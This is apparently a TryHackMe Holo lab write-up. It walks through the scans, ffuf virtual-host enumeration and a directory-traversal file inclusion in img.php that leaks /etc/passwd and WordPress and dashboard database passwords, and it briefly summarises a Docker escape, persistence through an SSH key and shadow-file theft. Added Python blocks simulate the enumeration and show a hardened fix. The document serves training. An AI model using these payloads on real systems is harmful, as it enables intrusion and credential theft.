$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.200.110.0/24,192.168.100.0/24 -- -sS -sV -sC -oN 10.200.110.0/24,192.168.100.0/24.$(basename $PWD).nmap.txt
L-SRV01
Port | Service | Notes |
---|---|---|
22 | SSH | |
80 | HTTP | Apache web server hosting a WordPress 5.5.3 site for {www.,}holo.live. Vhost enumeration also turns up admin.holo.live and dev.holo.live. |
33060 | MySQL | MySQL X Protocol port. |
TryHackMe's Task 9 points us towards virtual host enumeration of the web server. The idea is to send the same request repeatedly with a different Host header each time and keep only the responses that differ from the default site. We did this with ffuf and a subdomain wordlist, filtering out the default page by its size (21456 bytes) along with 400 and 302 responses:
$ ffuf -c -t 80 -u 'http://10.200.110.33/' -H 'Host: FUZZ.holo.live' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fc 400,302 -fs 21456

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.200.110.33/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.holo.live
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 80
 :: Matcher          : Response status: all
 :: Filter           : Response status: 400,302
 :: Filter           : Response size: 21456
________________________________________________

www                     [Status: 200, Size: 21405, Words: 1285, Lines: 156, Duration: 259ms]
admin                   [Status: 200, Size: 1845, Words: 453, Lines: 76, Duration: 5089ms]
dev                     [Status: 200, Size: 7515, Words: 639, Lines: 272, Duration: 5114ms]
The vhost enumeration found two more names worth looking at, admin and dev. Let's add both of them (and www) to our /etc/hosts file, pointing at 10.200.110.33.
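As an added illustration (not code from the original write-up or from the Holo lab), here is the same calibrate-then-filter logic that the ffuf run above performs, written in Python. It runs offline against a constructed stand-in for 10.200.110.33 whose response sizes are copied from the ffuf output; `http_fetch` is an assumed helper for pointing the same logic at a live host.

```python
import random
import string
import urllib.error
import urllib.request
from collections import namedtuple

# Added example, not part of the original write-up. It reimplements the idea
# behind the ffuf run: send the same request with a different Host header per
# wordlist entry and keep only responses that differ from what the default
# virtual host returns for a name that does not exist.

Response = namedtuple("Response", "status size")


def random_label(n=12):
    """A label that is vanishingly unlikely to be a configured vhost."""
    return "".join(random.choices(string.ascii_lowercase, k=n))


def enumerate_vhosts(fetch, domain, words, calibration_rounds=3):
    """Return {label: Response} for labels that look like real virtual hosts.

    fetch(host) -> Response is supplied by the caller, so the same logic runs
    against a live target or against a constructed fake (see below).
    Calibration: ask for a few random labels first; whatever (status, size)
    pairs come back for those is the 'not a vhost' baseline. This is what the
    ffuf filters -fs 21456 / -fc 400,302 encode by hand, and what its -ac
    option automates.
    """
    baseline = {fetch(f"{random_label()}.{domain}") for _ in range(calibration_rounds)}
    found = {}
    for label in words:
        resp = fetch(f"{label}.{domain}")
        if resp not in baseline:
            found[label] = resp
    return found


def http_fetch(url, timeout=10):
    """Build a fetch() that really sends GET requests to url with a given Host."""
    def fetch(host):
        req = urllib.request.Request(url, headers={"Host": host})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return Response(resp.status, len(resp.read()))
        except urllib.error.HTTPError as err:
            # 4xx/5xx responses still carry a body; its size is what we filter on
            return Response(err.code, len(err.read()))
    return fetch


def fake_holo_server():
    """Constructed stand-in for 10.200.110.33 so the example runs offline.

    Sizes are copied from the ffuf output above; the default vhost answers
    every unknown name with the 21456-byte page that ffuf filtered out.
    """
    known = {
        "www.holo.live": Response(200, 21405),
        "admin.holo.live": Response(200, 1845),
        "dev.holo.live": Response(200, 7515),
    }
    default = Response(200, 21456)

    def fetch(host):
        return known.get(host, default)
    return fetch


def demo():
    """Run the enumerator over a small constructed wordlist."""
    wordlist = ["www", "mail", "admin", "dev", "test", "staging"]
    return enumerate_vhosts(fake_holo_server(), "holo.live", wordlist)


if __name__ == "__main__":
    for label, resp in demo().items():
        print(f"{label:<10} status={resp.status} size={resp.size}")
```

Against a live target you would call `enumerate_vhosts(http_fetch("http://10.200.110.33/"), "holo.live", words)`. The calibration step matters more than the wordlist: without it, a server that answers every unknown name with the same 200 page drowns the real hits in noise, which is exactly why the ffuf command needed `-fs 21456`.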
Browsing dev.holo.live, the Talents page contains a number of images of Holo employees. The page source shows them being loaded through a PHP script that takes the file name as a query parameter (img.php?file=...). That immediately stood out to me as a possible local file inclusion, and a directory-traversal payload confirmed it:
$ curl 'http://dev.holo.live/img.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
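The source of img.php is not on the page, so as an added example (not the lab's code) the block below models the pattern behind this LFI in Python, inside a throwaway directory tree rather than the real filesystem, and puts a hardened version next to it. The /var/www/dev/img layout, the function names and the sample passwd line are all assumed.

```python
import os
import tempfile

# Added example, not code from the write-up or from the Holo lab. It models the
# img.php?file= behaviour seen above, a common wrong fix, and a hardened version,
# all against a constructed sandbox so it runs offline.


def build_sandbox():
    """Constructed filesystem: <root>/var/www/dev/img/ plus <root>/etc/passwd."""
    root = tempfile.mkdtemp(prefix="holo-lfi-")
    img_dir = os.path.join(root, "var", "www", "dev", "img")
    os.makedirs(img_dir)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(img_dir, "talent1.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0fake-jpeg-bytes")
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
    return root, img_dir


def img_vulnerable(img_dir, user_file):
    """The pattern behind the LFI: the request parameter is joined onto the
    image directory and read back with no check that it stays inside it."""
    with open(os.path.join(img_dir, user_file), "rb") as fh:
        return fh.read()


def img_filtered(img_dir, user_file):
    """A common wrong fix: delete '../' and hope. str.replace makes a single
    pass, so '....//' collapses to '../' after the filter has run."""
    return img_vulnerable(img_dir, user_file.replace("../", ""))


def img_hardened(img_dir, user_file):
    """Resolve the final path (following symlinks) and refuse anything that is
    not strictly inside the image directory. Absolute paths, traversal and
    symlink escapes all fail the commonpath check."""
    base = os.path.realpath(img_dir)
    target = os.path.realpath(os.path.join(base, user_file))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to serve {user_file!r}: outside {base}")
    with open(target, "rb") as fh:
        return fh.read()


def demo():
    """Run the three variants against the same payloads and report which ones
    leaked the passwd file and which ones blocked it."""
    root, img_dir = build_sandbox()
    traversal = "../../../../etc/passwd"            # img -> dev -> www -> var -> root
    bypass = "....//....//....//....//etc/passwd"   # survives the naive filter
    results = {
        "vulnerable_leaks": b"root:x:0:0" in img_vulnerable(img_dir, traversal),
        "filter_blocks_plain": False,
        "filter_leaks_bypass": b"root:x:0:0" in img_filtered(img_dir, bypass),
        "hardened_serves_image": img_hardened(img_dir, "talent1.jpg").startswith(b"\xff\xd8"),
        "hardened_blocks": False,
    }
    try:
        img_filtered(img_dir, traversal)
    except FileNotFoundError:
        results["filter_blocks_plain"] = True   # 'etc/passwd' relative to img/ does not exist
    try:
        img_hardened(img_dir, traversal)
    except PermissionError:
        results["hardened_blocks"] = True
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check:<24} {outcome}")
```

The four `..` segments in the payload match the assumed depth of /var/www/dev/img; on a real box extra segments are harmless because `/..` at the root stays at `/`, which is why the write-up's payload works without knowing the exact depth. The hardened version deliberately checks the resolved path rather than the string, so it is not fooled by `....//`, URL-encoded dots, or a symlink dropped into the image directory.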
Let's read the WordPress config through the same LFI to leak the database credentials (grep define keeps just the constant definitions):
$ curl -s 'http://dev.holo.live/img.php?file=../../../../var/www/wordpress/wp-config.php' | grep define
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'DBManagerLogin!' );
define( 'DB_HOST', '127.0.0.1' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
define('AUTH_KEY', 'c 8Ui7]??:^)!64-*duMT<JE=j^qG|,`jn<|c,G[-UG4]6lveE|JAMs s,f~]Bus');
define('SECURE_AUTH_KEY', 'y={Qrj;rk-guTo&G0lIm7TGPrSg+,J2CBRf2F<9#(O.:~2XR5 2$nTP|{5X|jP+*');
define('LOGGED_IN_KEY', 'c.G5Xn>d~Dc^<o]?S&hHY,:-nubV.D%V6&g734%#ht8t>+@0FONb+k$iz%BB.tTX');
define('NONCE_KEY', 'k2F.{B@kOl2Vzm]k66*}G&%(ywH1Hj-{KP`/#R_B9Rl (HLC`Dy=_2Ol1LfbB&+E');
define('AUTH_SALT', 'wq)-kpAUMl!e{XI$/g e8HKMP,$vyi-@(@e77CK%N|)@z9oTz}%/WXoF0)5|ye<>');
define('SECURE_AUTH_SALT', 'W&|w$+ EmvLO6o/$|{lU&ACm+Wazf5Y3`.csw.[0/k#HgW)K,5n?2r-a|<DH{h3?');
define('LOGGED_IN_SALT', '+,.gb4Cd7S?u.g 0`e_h}FXpBW|COgv-GG>{F-I@#$2p.|#oYjQ/{L]e3g:gvZ)e');
define('NONCE_SALT', 'CF;H:Q-w+_&@)vQJ;V0kZy<-MhBhD_MB#x)sCOU}Y(( E:ZkKx-kNxh[u01y.OuR');
define( 'WP_DEBUG', true );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
Besides the database password, note that the default "put your unique phrase here" keys and salts are defined before the real ones. PHP's define() keeps the first definition of a constant, so the placeholders are what WordPress actually sees; WordPress recognises that exact placeholder and falls back to salts stored in the database, so this is sloppy configuration rather than a directly usable key leak.

Digging further, robots.txt on admin.holo.live (http://admin.holo.live/robots.txt) lists some interesting paths:
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt
The database connection file in that directory, read through the same LFI, leaks another set of credentials. Note that DB_SRV points at 192.168.100.1, on the internal 192.168.100.0/24 range included in the initial scan:
$ curl -s 'http://dev.holo.live/img.php?file=../../../../var/www/admin/db_connect.php'
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());}
?>
From the admin dashboard we obtained command injection, which gave us a shell inside a Docker container.
From the container we found MySQL reachable and used it to plant further shells, which got us onto the host machine.
On the host we found a setuid docker binary and used it to spawn a root container with the host filesystem mounted inside it. From there we added our SSH key for easy access later and copied the shadow file to crack its password hashes offline.